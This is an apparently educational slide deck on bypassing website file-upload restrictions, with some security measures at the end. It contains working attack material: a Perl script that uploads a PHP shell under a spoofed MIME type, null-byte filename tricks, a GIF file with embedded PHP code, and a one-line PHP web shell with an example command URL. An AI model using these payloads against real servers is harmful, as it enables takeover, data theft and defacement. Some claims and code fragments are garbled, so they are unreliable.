1. BYPASS FILE UPLOAD RESTRICTIONS
ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian
K. R. Mukesh
2. File upload
• Necessity
• Social networking websites, blogs, File
sharing, etc.
• Web developers do not consider the threats
• Files should be sanitized
• If not, leads to local file inclusion and hacking
• Filtering mechanisms
4. Content-Type verification
• HTTP POST – MIME type
Content-Disposition: form-data;
name="uploaded file []";filename="18.jpg"rn
Content-Type : image/jpegrnr <file content>
• To bypass this filter,
edit the Content-Type
to an applicable one.
#!/usr/bin/perl
#
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$req = $ua->request(POST
'http://example.com/upload.PHP',
Content_Type => 'form-data',
Content => [
userfile => ["sh.PHP", "sh.PHP",
"Content-Type" =>
"application/pdf"],
],
);
print $req->as_string();
5. An easy way – Tamper data
• Tamper data – Mozilla add-on allows to
modify the POST data before submit
6. Filename extension verification
• Check the extension of the file
• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in filename
sh.php%00.pdf
(or)
sh.asp;xx.pdf
• While uploading, extension is .pdf
• When accessed, delivered to PHP interpreter
7. File content verification
• Applicable to image files
• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file
with an embedded PHP code
Content-Type: image/gif
GIF89a(...some binary data...)<?PHP
System($_GET[‘command’]);?>
(....binary data…)
• PHP interpreter execute the php code inside a
garbage of binary values
10. Worst case scenario
• Local file inclusion – PHP shell upload
• Simple PHP shell:
<?php System ($_GET [‘command’]);?>
• Executes commands on remote server
www.example.com/uploads/sh.php?command=‘ifconfig’
• Entire control of the server – rooting it
• Defacements, database access, credential
information theft, etc.
11. Security Measures
• Preventing direct access to the uploaded files
$uploaddir = '/var/spool/uploads/';
# Outside of root
• Block web access using .htaccess file
IndexIgnore */*
• Overhead to read and write
• Sometimes leads to potential directory
traversal attacks
12. Random file name implementation
• Prevents attacker knowing the name of the
file uploaded
• Map the names in the database
$res = $db->query("INSERT INTO uploads SET name=?,original_name=?”)
• Query while reading
• A little overhead, but secure
• Think again, leads to SQL injection
13. Conclusion
• Complicated to implement a secure file
upload facility
• Many filters = slow response. Leads to Denial
Of Service (DOS) attacks
• Best way is to maintain UPLOAD LOGS
containing user info like ip address, helpful to
trace an attacker
• Secure coding practices